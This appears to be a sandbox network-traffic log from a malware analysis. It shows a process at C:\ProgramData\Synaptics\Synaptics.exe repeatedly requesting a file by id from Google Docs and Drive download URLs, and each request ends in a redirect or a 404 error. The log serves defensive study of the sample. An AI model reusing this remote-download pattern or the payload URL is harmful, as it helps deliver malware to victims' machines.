P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-jgpIe8FgLX5jhY9N1ESzww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Content-Length: 1652
Server: UploadServer
Set-Cookie: NID=520=czYKQNpmbF8xhuE9ZZDngEfj9m1plovuJoyYjU4EiuE7tB9lL3Ilgxr-sn4Dib-PWEZ9YWy50kXcemjbyFsb5aD_4_PqJ_3F8VXnWk6W97rzmOV6c3a2MV332Ws7W0FyyqYnxD0COjJAzIn8kudCVQSzBa-LyX2gBLUCkSs92aCB3ytVv5R_nNg; expires=Tue, 01-Jul-2025 10:25:23 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:25:24 UTC | 1594 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 70 4c 36 34 6e 35 4e 5a 31 57 42 47 54 73 4c 52 4f 34 65 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ppL64n5NZ1WBGTsLRO4evA">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:24 UTC | 58 | IN | Data Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49723 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:23 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-12-30 10:25:24 UTC | 1602 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC67GMKUIhA5mINk54_qAF4PoixC-UDc-GV1Bz4vaUxSV2wpGu9Lix23_eJOt9xZWz9EZn_0Ewc
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:24 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-f4b_mMyWaIgXN3GzfDXqyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Set-Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP; expires=Tue, 01-Jul-2025 10:25:24 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:25:24 UTC | 1602 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 4f 6b 32 35 48 56 4a 44 77 37 6e 74 63 63 62 31 76 37 50 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Ok25HVJDw7ntccb1v7PGQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:24 UTC | 50 | IN | Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
Data Ascii: is server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49726 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:24 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:25:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:24 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-lV1prnTf8wc49AxikkyCqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49727 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:24 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:25:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:24 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-DLcceDpHEJJ8dRgvi3fIUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49728 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
2024-12-30 10:25:25 UTC | 1250 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7XiieQRc04AK74f-HHOxPyQ8uz2GNFoPLU-T-s-dj-Na3BKrn6y3r5DewtTX-bM7GWcaJXJzA
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:24 GMT
    Content-Security-Policy: script-src 'report-sample' 'nonce-3aD9-CNYblhsc-4QNMOJew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:25 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:25 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="KjFIOS564AwKyjIAtu9CqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:25 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49730 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
2024-12-30 10:25:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC6CnMTE8cnbgu3l_dQOP5JeZjAiv-iKXOObpP1z3dvj1TFJIOQ5URm5aFFaAL2FBTQU
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:25 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-Jg1xiFdq0G9mwlzg40wuPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="nkVUp0rTVy8bh-f8doo2nw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:25 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49740 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:26 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-z6hRVHrrpnnCOOVawROjhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49739 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:26 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-EP6FK7GSEWflgNLk0qU3XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49744 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:27 UTC | 1243 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5QsWSPFT7-ai2Lw8XcgiylFdkg7Ps7VmTZLwocS-NCUR3fOxBYmn4y1wyAnFemT_X_
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:27 GMT
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-fcsdbU19w55fbotYIYA5ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:27 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:27 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="oibuW_hkI17HJpCCXYtwKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:27 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49747 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:27 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Host: docs.google.com
  Cache-Control: no-cache
2024-12-30 10:25:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
  Content-Type: application/binary
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:25:27 GMT
  Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
  Strict-Transport-Security: max-age=31536000
  Content-Security-Policy: script-src 'report-sample' 'nonce-RzpQ0Ffvikx_ZM30DTBNTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Cross-Origin-Opener-Policy: same-origin
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Server: ESF
  Content-Length: 0
  X-XSS-Protection: 0
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49745 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:27 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Host: docs.google.com
  Cache-Control: no-cache
2024-12-30 10:25:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
  Content-Type: application/binary
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:25:27 GMT
  Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
  Strict-Transport-Security: max-age=31536000
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Content-Security-Policy: script-src 'report-sample' 'nonce-llOh5iMOy_73fbj3Nay8Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Cross-Origin-Opener-Policy: same-origin
  Server: ESF
  Content-Length: 0
  X-XSS-Protection: 0
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49746 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
